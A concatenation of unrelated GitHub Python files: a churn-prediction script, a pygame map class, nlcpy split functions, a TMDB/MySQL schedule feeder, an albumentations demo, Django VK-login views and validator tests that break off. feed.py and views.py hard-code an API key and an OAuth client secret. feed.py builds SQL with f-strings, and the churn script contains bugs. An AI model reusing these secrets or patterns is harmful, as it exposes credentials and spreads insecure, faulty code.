\r\n################ Train Random Forest classifier ############################\r\nmodel = RandomForestClassifier(random_state=42)\r\n\r\nmodel_pipeline_1 = make_pipeline(trf2,trf3, model)\r\nmodel_pipeline_1.fit(x_train, y_train)\r\n\r\n# Make predictions on the test set\r\ny_pred_1 = model_pipeline_1.predict(x_test)\r\n\r\n# Evaluate the best model's performance\r\naccuracy = accuracy_score(y_test, y_pred_1)\r\nprint(accuracy)\r\nclassification_rep = classification_report(y_test, y_pred_1)\r\n\r\nprint(\"Best Model Parameters:\", grid_search.best_params_)\r\nprint(\"Best Model Accuracy:\", accuracy)\r\nprint(\"\\nClassification Report for Best Model:\\n\", classification_rep)\r\n\r\n################### Train MLP classifier #################################\r\n\r\nfrom sklearn.neural_network import MLPClassifier\r\n\r\nmodel_2 = MLPClassifier(hidden_layer_sizes=(500,), max_iter=1000)\r\n\r\nmodel_pipeline_2 = make_pipeline(trf2,trf3, model_2)\r\n\r\nmodel_pipeline_2.fit(x_train, y_train)\r\n\r\n# Make predictions on the test set\r\ny_pred_2 = model_pipeline_2.predict(x_test)\r\n\r\n# Evaluate the best model's performance\r\naccuracy = accuracy_score(y_test, y_pred_2)\r\nprint(accuracy)\r\nclassification_rep = classification_report(y_test, y_pred_2)\r\nprint(\"Best Model Accuracy:\", 
accuracy)\r\nprint(\"\\nClassification Report for Best Model:\\n\", classification_rep)\r\n\r\n################## Train Light Gradient Boosting ###############\r\nimport lightgbm as lgb\r\n\r\n# LightGBM Model\r\nlgb_model = lgb.LGBMClassifier( boosting_type='gbdt',objective='binary',num_leaves=2,max_depth=5,learning_rate=0.1,\r\n n_estimators=500, random_state=42)\r\n\r\n\r\nmodel_pipeline_3 = make_pipeline(trf2,trf3, lgb_model)\r\n\r\n# Train the LightGBM model\r\nmodel_pipeline_3.fit(x_train, y_train)\r\n\r\n# Predict using the LightGBM model\r\n# Make predictions on the test set\r\ny_pred_3 = model_pipeline_3.predict(x_test)\r\n\r\n# Evaluate the best model's performance\r\naccuracy = accuracy_score(y_test, y_pred_3)\r\nprint(accuracy)\r\nclassification_rep = classification_report(y_test, y_pred_3)\r\nprint(\"Best Model Accuracy:\", accuracy)\r\nprint(\"\\nClassification Report for Best Model:\\n\", classification_rep)\r\n\r\n### Fine the Model using Hyper parameters\r\n# Define the parameter grid to search\r\nparam_grid = {\r\n 'num_leaves': [15, 20, 25, 30], # Experiment with different values\r\n 'max_depth': [5, 10, 15],\r\n 'learning_rate': [0.01, 0.1, 0.2],\r\n 'n_estimators': [100, 200, 300],\r\n}\r\n\r\n# Initialize the LightGBM model\r\nlgb_model = lgb.LGBMClassifier(boosting_type='gbdt', objective='binary', random_state=42)\r\n\r\n# Initialize GridSearchCV\r\ngrid_search = GridSearchCV(lgb_model, param_grid, cv=5, scoring='accuracy')\r\n\r\nmodel_pipeline_3H = make_pipeline(trf2,trf3, grid_search)\r\n\r\n# Fit the grid search to your data\r\nmodel_pipeline_3H.fit(x_train, y_train)\r\n\r\n# Get the best model after hyperparameter tuning\r\nbest_model = grid_search.best_estimator_\r\nbest_params = grid_search.best_params_\r\n\r\nmodel_pipeline_LGBh = make_pipeline(trf2,trf3, best_model)\r\n\r\ny_pred_4 = model_pipeline_LGBh.predict(x_test)\r\n# Evaluate the best model's performance\r\naccuracy = accuracy_score(y_test, y_pred_4)\r\nprint(\"Best Model Parameters:\", best_params)\r\nprint(\"Best Model Accuracy:\", accuracy)\r\n\r\n\r\n# Tried multiple modelbut all are giving around 50 % accuracy which shows model is a under fit model.\r\n\r\n################## Train Artificial Neural Network ##########################\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout\r\nfrom keras.optimizers import Adam\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n# Define the neural network architecture\r\nmodel = Sequential()\r\nmodel.add(Dense(128, activation='relu', input_dim=x_train.shape[1]))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Dense(64, activation='relu'))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Dense(1, activation='sigmoid')) # Binary classification\r\n\r\n# Compile the model\r\nmodel.compile(loss='binary_crossentropy', optimizer=Adam(learning_rate=0.001), metrics=['accuracy'])\r\n\r\n\r\nx_train_encod = trf2.fit_transform(x_train)\r\nx_train_scales = trf3.fit_transform(x_train_encod)\r\nx_test_encod = trf2.fit_transform(x_test)\r\nx_test_scales = trf3.fit_transform(x_test_encod)\r\n\r\nx_train = x_train_scales.astype(np.float32)\r\nx_test = x_test_scales.astype(np.float32)\r\n\r\n\r\n# Train the model\r\nmodel.fit(x_train, y_train, epochs=100, batch_size=32, validation_split=0.2, verbose=1)\r\n\r\ny_pred = model.predict(x_test_scales)\r\ny_pred_binary = [1 if val > 0.5 else 0 for val in y_pred]\r\naccuracy = accuracy_score(y_test, y_pred_binary)\r\nprint(\"Test Set Accuracy:\", accuracy)\r\n\r\n# dumping KNN classifer as it was the best one 
amongst all ML algorithms\r\nimport pickle\r\npickle.dump(model_pipeline,open('model_pipeline1.pkl','wb'))\r\n","repo_name":"KoriPankaj/customer_churn_predcition","sub_path":"customer_churn.py","file_name":"customer_churn.py","file_ext":"py","file_size_in_byte":9049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33018747694","text":"# import the pygame module, so you can use it\r\nimport pickle\r\nimport pygame\r\nimport time\r\n\r\nfrom pygame.locals import *\r\nfrom random import random, randint\r\nimport numpy as np\r\n\r\nBLUE = (0, 0, 255)\r\nVIOLET = (136, 77, 109)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\n\r\nclass DMap:\r\n\r\n def __init__(self):\r\n self.__n = 20\r\n self.__m = 20\r\n self.__surface = np.zeros((self.__n, self.__m))\r\n for i in range(self.__n):\r\n for j in range(self.__m):\r\n self.__surface[i][j] = -1\r\n\r\n def getN(self):\r\n return self.__n\r\n\r\n def getM(self):\r\n return self.__m\r\n\r\n def getSurface(self):\r\n return self.__surface\r\n\r\n\r\n\r\n def validCoordinates(self, x, y):\r\n return 0 <= x < self.__n and 0 <= y < self.__m\r\n\r\n def getValue(self, x, y):\r\n if not self.validCoordinates(x, y):\r\n raise Exception(\" The current coordinates are not valid\")\r\n return self.__surface[x][y]\r\n\r\n def image(self, x, y):\r\n\r\n imagine = pygame.Surface((420, 420))\r\n brick = pygame.Surface((20, 20))\r\n empty = pygame.Surface((20, 20))\r\n empty.fill(WHITE)\r\n brick.fill(BLACK)\r\n imagine.fill(VIOLET)\r\n\r\n for i in range(self.__n):\r\n for j in range(self.__m):\r\n if self.__surface[i][j] == 1:\r\n imagine.blit(brick, (j * 20, i * 20))\r\n elif self.__surface[i][j] == 0:\r\n imagine.blit(empty, (j * 20, i * 20))\r\n\r\n drona = pygame.image.load(\"../drona.png\")\r\n imagine.blit(drona, (y * 20, x * 20))\r\n return imagine","repo_name":"ElinaBarabas/Drone","sub_path":"Model/DMap.py","file_name":"DMap.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10720533263","text":"import numpy\nimport nlcpy\n\n\ndef split(ary, indices_or_sections, axis=0):\n \"\"\"Splits an array into multiple sub-arrays.\n\n Parameters\n ----------\n ary : ndarray\n Array to be divided into sub-arrays.\n indices_or_sections : int or 1-D array\n If *indices_or_sections* is an integer, N, the array will be divided into N\n equal arrays along *axis*. If such a split is not possible, an error is raised.\n If *indices_or_sections* is a 1-D array of sorted integers, the entries indicate\n where along *axis* the array is split. 
For example, ``[2, 3]`` would,\n for ``axis=0``, result in\n\n - ary[:2]\n - ary[2:3]\n - ary[3:]\n\n If an index exceeds the dimension of the array along *axis*, an empty sub-array\n is returned correspondingly.\n axis : int, optional\n The axis along which to split, default is 0.\n\n Returns\n -------\n A list of sub-arrays.\n\n See Also\n --------\n hsplit : Splits an array into multiple sub-arrays horizontally (column-wise).\n vsplit : Splits an array into multiple sub-arrays vertically (row-wise).\n concatenate : Joins a sequence of arrays along an existing axis.\n stack : Joins a sequence of arrays along a new axis.\n hstack : Stacks arrays in sequence horizontally (column wise).\n vstack : Stacks arrays in sequence vertically (row wise).\n\n Examples\n --------\n >>> import nlcpy as vp\n >>> x = vp.arange(9.0)\n >>> vp.split(x, 3)\n [array([0., 1., 2.]), array([3., 4., 5.]), array([6., 7., 8.])]\n\n >>> x = vp.arange(6)\n >>> vp.split(x, [3, 4, 7])\n [array([0, 1, 2]), array([3]), array([4, 5]), array([], dtype=int64)]\n \"\"\"\n size = ary.shape[axis]\n if numpy.isscalar(indices_or_sections):\n if size % indices_or_sections:\n raise ValueError(\n 'array split does not result in an equal division')\n Nsections = int(indices_or_sections)\n if Nsections <= 0:\n raise ValueError('number sections must be larger than 0.')\n Neach_section, extras = divmod(size, Nsections)\n section_sizes = ([0] +\n extras * [Neach_section + 1] +\n (Nsections - extras) * [Neach_section])\n TH_cumsum = 2000\n if len(section_sizes) < TH_cumsum:\n div_points = numpy.array(section_sizes, dtype=nlcpy.intp).cumsum()\n else:\n div_points = nlcpy.array(section_sizes, dtype=nlcpy.intp).cumsum().tolist()\n else:\n Nsections = len(indices_or_sections) + 1\n div_points = [0] + list(indices_or_sections) + [size]\n\n sub_arys = []\n sary = nlcpy.swapaxes(ary, axis, 0)\n for i in range(Nsections):\n st = div_points[i]\n end = div_points[i + 1]\n sub_arys.append(nlcpy.swapaxes(sary[st:end], axis, 0))\n\n return sub_arys\n\n\ndef hsplit(ary, indices_or_sections):\n \"\"\"Splits an array into multiple sub-arrays horizontally (column-wise).\n\n Please refer to the :func:`split` documentation. hsplit is equivalent to\n :func:`split` with ``axis=1``, the array is always split along the second axis\n regardless of the array dimension.\n\n See Also\n --------\n split : Splits an array into multiple sub-arrays.\n\n Examples\n --------\n >>> import nlcpy as vp\n >>> x = vp.arange(16.0).reshape(4, 4)\n >>> x\n array([[ 0., 1., 2., 3.],\n [ 4., 5., 6., 7.],\n [ 8., 9., 10., 11.],\n [12., 13., 14., 15.]])\n >>> vp.hsplit(x, 2)\n [array([[ 0., 1.],\n [ 4., 5.],\n [ 8., 9.],\n [12., 13.]]), array([[ 2., 3.],\n [ 6., 7.],\n [10., 11.],\n [14., 15.]])]\n >>> vp.hsplit(x, vp.array([3, 6]))\n [array([[ 0., 1., 2.],\n [ 4., 5., 6.],\n [ 8., 9., 10.],\n [12., 13., 14.]]), array([[ 3.],\n [ 7.],\n [11.],\n [15.]]), array([], shape=(4, 0), dtype=float64)]\n \"\"\"\n ary = nlcpy.asanyarray(ary)\n if ary.ndim == 0:\n raise ValueError('hsplit only works on arrays of 1 or more dimensions')\n if ary.ndim > 1:\n return split(ary, indices_or_sections, 1)\n else:\n return split(ary, indices_or_sections, 0)\n\n\ndef vsplit(ary, indices_or_sections):\n \"\"\"Splits an array into multiple sub-arrays vertically (row-wise).\n\n Please refer to the :func:`split` documentation. 
vsplit is equivalent to\n :func:`split` with ``axis=0`` (default), the array is always split along the\n first axis regardless of the array dimension.\n\n See Also\n --------\n split : Splits an array into multiple sub-arrays.\n\n Examples\n --------\n >>> import nlcpy as vp\n >>> x = vp.arange(16.0).reshape(4, 4)\n >>> x\n array([[ 0., 1., 2., 3.],\n [ 4., 5., 6., 7.],\n [ 8., 9., 10., 11.],\n [12., 13., 14., 15.]])\n >>> vp.vsplit(x, 2)\n [array([[0., 1., 2., 3.],\n [4., 5., 6., 7.]]), array([[ 8., 9., 10., 11.],\n [12., 13., 14., 15.]])]\n >>> z1, z2, z3 = vp.vsplit(x, vp.array([3, 6]))\n >>> z1; z2; z3;\n array([[ 0., 1., 2., 3.],\n [ 4., 5., 6., 7.],\n [ 8., 9., 10., 11.]])\n array([[12., 13., 14., 15.]])\n array([], shape=(0, 4), dtype=float64)\n\n With a higher dimensional array the split is still along the first axis.\n\n >>> x = vp.arange(8.0).reshape(2, 2, 2)\n >>> x\n array([[[0., 1.],\n [2., 3.]],\n \n [[4., 5.],\n [6., 7.]]])\n >>> vp.vsplit(x, 2)\n [array([[[0., 1.],\n [2., 3.]]]), array([[[4., 5.],\n [6., 7.]]])]\n \"\"\"\n ary = nlcpy.asanyarray(ary)\n if ary.ndim < 2:\n raise ValueError('vsplit only works on arrays of 2 or more dimensions')\n return split(ary, indices_or_sections, 0)\n","repo_name":"SX-Aurora/nlcpy","sub_path":"nlcpy/manipulation/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"43"} +{"seq_id":"40318794336","text":"import requests \nimport mysql.connector\nfrom mysql.connector import Error\nimport json\nfrom faker import Faker\nfrom random import randint\nimport datetime\nimport timestring\n\nnow = datetime.datetime.now()\nnow = f'{now.year}-{now.month}-{now.day}'\nweek_ago = datetime.datetime.now() - datetime.timedelta(days=7)\nweek_ago = f'{week_ago.year}-{week_ago.month}-{week_ago.day}'\n# print(week_ago)\n\nresponse = requests.get(f'https://api.themoviedb.org/3/discover/movie?api_key=73d46027b91c9b97aad44eccdc904b85&language=en-US&sort_by=popularity.desc&include_adult=false&include_video=false&page=1&primary_release_date.gte={week_ago}&primary_release_date.lte={now}&vote_count.gte=1')\nnow_playing = response.json()\nnow_playing = now_playing['results']\n\n# print(now_playing)\ntry:\n connection = mysql.connector.connect(host='127.0.0.1',\n database='engi_cinema',\n user='root',\n password='')\n\n# now_playing = response.json()\n# now_playing = now_playing['results']\n array_film = []\n for film in now_playing:\n array_film.append((film['id'],film['release_date'],film['vote_average']))\n\n # print(array_film)\n array_min = [0,5]\n\n if connection.is_connected():\n db_Info = connection.get_server_info()\n print(\"Connected to MySQL Server version \", db_Info)\n cursor = connection.cursor()\n cursor.execute(\"select database();\")\n # cursor.execute()\n record = cursor.fetchone()\n for i in array_film:\n # print(i)\n # release_date = None\n release_date = datetime.datetime.strptime(i[1], '%Y-%m-%d').date()\n # week_ago = release_date + datetime.timedelta(days=2)\n print(week_ago)\n cursor.execute(f\"SELECT DISTINCT movieID FROM `schedule` WHERE movieID = {i[0]};\")\n if (cursor.fetchone() == None):\n print('bisa',i)\n arr_temp = []\n for j in range(5):\n temp = release_date + datetime.timedelta(days=j)\n temp = datetime.datetime(temp.year, temp.month, temp.day, randint(10,23), randint(0,5)*10+array_min[randint(0,1)], 0)\n arr_temp.append(temp)\n a = sorted(arr_temp)\n for temp in a:\n date = temp.strftime('%Y-%m-%d')\n time = 
temp.strftime('%I.%M %p')\n query = f'INSERT INTO `schedule`(`movieID`, `scheduleDate`, `scheduleTime`, `seat`) VALUES ({i[0]},\\'{date}\\',\\'{time}\\',30)'\n # print(query)\n cursor.execute(query)\n # else:\n # print('tidak bisa',i)\n connection.commit() \n\nexcept Error as e:\n print(\"Error while connecting to MySQL\", e)\nfinally:\n if (connection.is_connected()):\n cursor.close()\n connection.close()\n print(\"MySQL connection is closed\")","repo_name":"nixonandhika/Engima","sub_path":"util/feed.py","file_name":"feed.py","file_ext":"py","file_size_in_byte":2987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11174516578","text":"import numpy as np\nimport random\nimport cv2\nimport albumentations as A\n\nkeypoints = [\n (100, 100, 50, np.pi/4.0),\n (720, 410, 50, np.pi/4.0),\n (1100, 400, 50, np.pi/4.0),\n (1700, 30, 50, np.pi/4.0),\n (300, 650, 50, np.pi/4.0),\n (1570, 590, 50, np.pi/4.0),\n (560, 800, 50, np.pi/4.0),\n (1300, 750, 50, np.pi/4.0),\n (900, 1000, 50, np.pi/4.0),\n (910, 780, 50, np.pi/4.0),\n (670, 670, 50, np.pi/4.0),\n (830, 670, 50, np.pi/4.0),\n (1000, 670, 50, np.pi/4.0),\n (1150, 670, 50, np.pi/4.0),\n (820, 900, 50, np.pi/4.0),\n (1000, 900, 50, np.pi/4.0),\n] # 15개 \n\nKEYPOINT_COLOR = (0, 255, 0) # Green\n\ndef vis_keypoints(image, keypoints, color=KEYPOINT_COLOR, diameter=15):\n image = image.copy()\n for (x, y, s, a) in keypoints:\n print(x, y, s, a)\n cv2.circle(image, (int(x), int(y)), diameter, color, -1)\n\n x0 = int(x) + s * np.cos(a)\n y0 = int(y) - s * np.sin(a)\n cv2.arrowedLine(image, (int(x), int(y)), (int(x0), int(y0)), color, 2)\n\n cv2.imshow(\"test\", image)\n cv2.waitKey(0)\n\nimage = cv2.imread(\"./2022.12/12.15_d52_image/data/fox.png\")\n# image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n# vis_keypoints(image, keypoints)\n\ntransform = A.Compose([\n A.ShiftScaleRotate(p=1),\n], keypoint_params=A.KeypointParams(format='xysa', angle_in_degrees=False))\n\ntransformed = transform(image=image, keypoints=keypoints)\nvis_keypoints(transformed['image'], transformed['keypoints'])\n\n\n","repo_name":"yeoiksu/Microsoft-AI-School","sub_path":"2022.12/12.15_d52_image/02_keypoint.py","file_name":"02_keypoint.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"28183243920","text":"import urllib\nimport json\nimport vk\n\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom django.contrib import auth\nfrom MainApp.models import User, Post\nfrom . 
import tools\n\n# Create your views here.\n\n\ndef get_access_token(request):\n client_id = '6340308'\n client_secret = 'K1umBhHtCQNdl6LW8bVk'\n redirect_uri = 'http://turmezzz.pythonanywhere.com/get_access_token'\n code = request.GET['code']\n url = f'https://oauth.vk.com/access_token?client_id={client_id}&client_secret={client_secret}&redirect_uri={redirect_uri}&code={code}'\n data = json.loads(urllib.request.urlopen(url).read())\n access_token = data['access_token']\n vk_id = data['user_id']\n\n user = auth.authenticate(username=vk_id, password='password')\n if user is None or user.is_anonymous():\n user = User.objects.create(username=vk_id, access_token=access_token)\n user.set_password('password')\n user.save()\n auth.login(request, user)\n tool = tools.Tool(request)\n tool.create_new_account()\n auth.authenticate(username=vk_id, password='password')\n else:\n user = User.objects.get(username=vk_id)\n user.access_token = access_token\n user.save()\n auth.login(request, user)\n tool = tools.Tool(request)\n tool.update_posts()\n return redirect('home')\n\n\ndef login(request):\n if request.user.is_authenticated():\n return redirect('home')\n else:\n return render(request, 'MainApp/auth.html')\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('login')\n\n\ndef home(request):\n if not request.user.is_authenticated():\n return redirect('login')\n\n tool = tools.Tool(request)\n tool.update_posts()\n img_url = tool.get_img_url()\n name = tool.get_name()\n\n data = {'img_url': img_url, 'name': name}\n return render(request, 'MainApp/home.html', data)\n\n\ndef search(request):\n if not request.user.is_authenticated():\n return redirect('login')\n\n # Здесь не происходит обновления постов\n\n if request.method == 'GET':\n q = request.GET['q']\n tool = tools.Tool(request)\n posts = tools.search(request.user, q)\n messages = []\n img_url = tool.get_img_url()\n name = tool.get_name()\n\n if len(posts) == 0:\n messages = ['По запросу не найдено постов']\n\n data = {'query': q, 'img_url': img_url, 'name': name, 'posts': posts, 'messages': messages}\n return render(request, 'MainApp/output.html', data)\n return HttpResponse('reload page')\n\n","repo_name":"turmezzz/Vlery","sub_path":"MainApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2635,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"42878778601","text":"# :coding: utf-8\n\nimport pytest\nimport six\n\nimport wiz.validator\nimport wiz.exception\n\n\ndef test_validate_definition_minimal():\n \"\"\"Validate minimal definition data mapping.\"\"\"\n wiz.validator.validate_definition({\"identifier\": \"foo\"})\n\n\ndef test_validate_definition_with_version():\n \"\"\"Validate definition data mapping with 'version' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\"\n })\n\n\ndef test_validate_definition_with_description():\n \"\"\"Validate definition data mapping with 'description' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"description\": \"This is a definition\",\n })\n\n\ndef test_validate_definition_with_disabled():\n \"\"\"Validate definition data mapping with 'disabled' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"disabled\": True,\n })\n\n\ndef test_validate_definition_with_auto_use():\n \"\"\"Validate definition data mapping with 'auto-use' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": 
\"foo\",\n \"auto-use\": True,\n })\n\n\ndef test_validate_definition_with_system():\n \"\"\"Validate definition data mapping with 'system' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"system\": {\n \"platform\": \"linux\",\n \"os\": \"el >=7, <8\",\n \"arch\": \"x86_64\"\n },\n })\n\n\ndef test_validate_definition_with_environ():\n \"\"\"Validate definition data mapping with 'environ' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"environ\": {\n \"KEY1\": \"VALUE1\",\n \"KEY2\": \"VALUE2\",\n \"KEY3\": \"PATH1:PATH2:PATH3\"\n },\n })\n\n\ndef test_validate_definition_with_command():\n \"\"\"Validate definition data mapping with 'command' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"command\": {\n \"app\": \"App0.1\",\n \"appX\": \"App0.1 --option value\"\n },\n })\n\n\ndef test_validate_definition_with_requirements():\n \"\"\"Validate definition data mapping with 'requirements' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"requirements\": [\n \"envA >= 1.0.0\",\n \"envB >= 3.4.2, < 4\",\n \"envC\"\n ],\n })\n\n\ndef test_validate_definition_with_conditions():\n \"\"\"Validate definition data mapping with 'conditions' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"conditions\": [\n \"envA >= 1.0.0\",\n \"envB >= 3.4.2, < 4\",\n \"envC\"\n ],\n })\n\n\ndef test_validate_definition_with_variants():\n \"\"\"Validate definition data mapping with 'variants' keyword.\"\"\"\n wiz.validator.validate_definition({\n \"identifier\": \"foo\",\n \"version\": \"0.1.0\",\n \"description\": \"This is a definition\",\n \"variants\": [\n {\n \"identifier\": \"1.0\",\n \"environ\": {\n \"VERSION\": \"1.0\"\n },\n \"requirements\": [\n \"envA >= 1.0, < 2\"\n ]\n },\n {\n \"identifier\": \"2.0\",\n \"environ\": {\n \"VERSION\": \"2.0\"\n },\n \"command\": {\n \"app\": \"App2.0\",\n },\n \"requirements\": [\n \"envA >= 2.0, < 3\"\n ]\n },\n {\n \"identifier\": \"XXX\",\n \"command\": {\n \"app\": \"AppXXX\",\n },\n }\n ],\n })\n\n\n@pytest.mark.parametrize(\"value, message\", [\n (42, \"Data has incorrect type.\"),\n ({\"test\": \"foo\"}, \"Data contains invalid keywords: test\"),\n ({}, \"'identifier' is required.\"),\n ({\"identifier\": 0}, \"'identifier' has incorrect type.\"),\n ({\"identifier\": \"foo\", \"version\": 0}, \"'version' has incorrect type.\"),\n (\n {\"identifier\": \"foo\", \"description\": 0},\n \"'description' has incorrect type.\"\n ),\n ({\"identifier\": \"foo\", \"disabled\": 0}, \"'disabled' has incorrect type.\"),\n ({\"identifier\": \"foo\", \"system\": 0}, \"'system' has incorrect type.\"),\n ({\"identifier\": \"foo\", \"environ\": 0}, \"'environ' has incorrect type.\"),\n ({\"identifier\": \"foo\", \"command\": 0}, \"'command' has incorrect type.\"),\n (\n {\"identifier\": \"foo\", \"requirements\": 0},\n \"'requirements' has incorrect type.\"\n ),\n (\n {\"identifier\": \"foo\", \"conditions\": 0},\n \"'conditions' has incorrect type.\"\n ),\n ({\"identifier\": \"foo\", \"variants\": 0}, \"'variants' has incorrect type.\"),\n], ids=[\n 
\"incorrect-type\",\n \"invalid-keywords\",\n \"identifier-missing\",\n \"identifier-incorrect\",\n \"version-incorrect\",\n \"description-incorrect\",\n \"disabled-incorrect\",\n \"system-incorrect\",\n \"environ-incorrect\",\n \"command-incorrect\",\n \"requirements-incorrect\",\n \"conditions-incorrect\",\n \"variants-incorrect\",\n])\ndef test_validate_definition_failed(value, message):\n \"\"\"Raise error when data is incorrect.\"\"\"\n with pytest.raises(wiz.exception.DefinitionError) as error:\n wiz.validator.validate_definition(value)\n\n assert message in str(error)\n\n\ndef test_validate_identifier_keyword():\n \"\"\"Validate 'identifier' keyword within data.\"\"\"\n wiz.validator.validate_identifier_keyword({\"identifier\": \"foo\"})\n\n\n@pytest.mark.parametrize(\"value, options, message\", [\n ({}, {}, \"'identifier' is required.\"),\n ({\"identifier\": 42}, {}, \"'identifier' has incorrect type.\"),\n ({}, {\"variant_index\": 1}, \"'variants/1/identifier' is required.\"),\n], ids=[\n \"required\",\n \"incorrect-type\",\n \"variant-index\",\n])\ndef test_validate_identifier_keyword_failed(value, options, message):\n \"\"\"Raise error when 'identifier' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_identifier_keyword(value, **options)\n\n assert message in str(error)\n\n\ndef test_validate_version_keyword():\n \"\"\"Validate 'version' keyword within data.\"\"\"\n wiz.validator.validate_version_keyword({})\n wiz.validator.validate_version_keyword({\"version\": \"0.1.0\"})\n\n\n@pytest.mark.parametrize(\"value, message\", [\n ({\"version\": 42}, \"'version' has incorrect type.\"),\n ({\"version\": \"_\"}, \"Invalid version: '_'\"),\n ({\"version\": \"abc\"}, \"Invalid version: 'abc'\"),\n ({\"version\": \"test0.1.0\"}, \"Invalid version: 'test0.1.0'\"),\n ({\"version\": \"0.1.*\"}, \"Invalid version: '0.1.*'\"),\n ({\"version\": \"0.1.\"}, \"Invalid version: '0.1.'\"),\n ({\"version\": \"#@;\"}, \"Invalid version: '#@;'\"),\n], ids=[\n \"incorrect-type\",\n \"incorrect-version-1\",\n \"incorrect-version-2\",\n \"incorrect-version-3\",\n \"incorrect-version-4\",\n \"incorrect-version-5\",\n \"incorrect-version-6\",\n])\ndef test_validate_version_keyword_failed(value, message):\n \"\"\"Raise error when 'version' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_version_keyword(value)\n\n assert message in str(error)\n\n\ndef test_validate_namespace_keyword():\n \"\"\"Validate 'namespace' keyword within data.\"\"\"\n wiz.validator.validate_namespace_keyword({})\n wiz.validator.validate_namespace_keyword({\"namespace\": \"foo\"})\n\n\ndef test_validate_namespace_keyword_failed():\n \"\"\"Raise error when 'namespace' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_namespace_keyword({\"namespace\": True})\n\n assert \"'namespace' has incorrect type.\" in str(error)\n\n\ndef test_validate_description_keyword():\n \"\"\"Validate 'description' keyword within data.\"\"\"\n wiz.validator.validate_description_keyword({})\n wiz.validator.validate_description_keyword({\"description\": \"test\"})\n\n\ndef test_validate_description_keyword_failed():\n \"\"\"Raise error when 'description' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_description_keyword({\"description\": True})\n\n assert \"'description' has incorrect type.\" in str(error)\n\n\ndef test_validate_auto_use_keyword():\n \"\"\"Validate 
'auto-use' keyword within data.\"\"\"\n wiz.validator.validate_auto_use_keyword({})\n wiz.validator.validate_auto_use_keyword({\"auto-use\": True})\n\n\ndef test_validate_auto_use_keyword_failed():\n \"\"\"Raise error when 'auto-use' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_auto_use_keyword({\"auto-use\": \"foo\"})\n\n assert \"'auto-use' has incorrect type.\" in str(error)\n\n\ndef test_validate_disabled_keyword():\n \"\"\"Validate 'disabled' keyword within data.\"\"\"\n wiz.validator.validate_disabled_keyword({})\n wiz.validator.validate_disabled_keyword({\"disabled\": True})\n\n\ndef test_validate_disabled_keyword_failed():\n \"\"\"Raise error when 'disabled' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_disabled_keyword({\"disabled\": \"foo\"})\n\n assert \"'disabled' has incorrect type.\" in str(error)\n\n\ndef test_validate_install_root_keyword():\n \"\"\"Validate 'install-root' keyword within data.\"\"\"\n wiz.validator.validate_install_root_keyword({})\n wiz.validator.validate_install_root_keyword({\n \"install-root\": \"/path/to/install/root\"\n })\n\n\ndef test_validate_install_root_keyword_failed():\n \"\"\"Raise error when 'install-root' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_install_root_keyword({\"install-root\": False})\n\n assert \"'install-root' has incorrect type.\" in str(error)\n\n\ndef test_validate_install_location_keyword():\n \"\"\"Validate 'install-location' keyword within data.\"\"\"\n wiz.validator.validate_install_location_keyword({})\n wiz.validator.validate_install_location_keyword({\n \"install-location\": \"/path/to/install/location\"\n })\n\n\ndef test_validate_install_location_keyword_failed():\n \"\"\"Raise error when 'install-location' keyword is incorrect.\"\"\"\n with pytest.raises(ValueError) as error:\n wiz.validator.validate_install_location_keyword({\"install-location\": 0})\n\n assert \"'install-location' has incorrect type.\" in str(error)\n\n\ndef test_validate_system_keyword():\n \"\"\"Validate 'system' keyword within data.\"\"\"\n wiz.validator.validate_system_keyword({})\n wiz.validator.validate_system_keyword({\"system\": {\"platform\": \"linux\"}})\n wiz.validator.validate_system_keyword({\"system\": {\"os\": \"el >= 7.4\"}})\n wiz.validator.validate_system_keyword({\"system\": {\"arch\": \"x86_64\"}})\n\n\n@pytest.mark.parametrize(\"value, message\", [\n 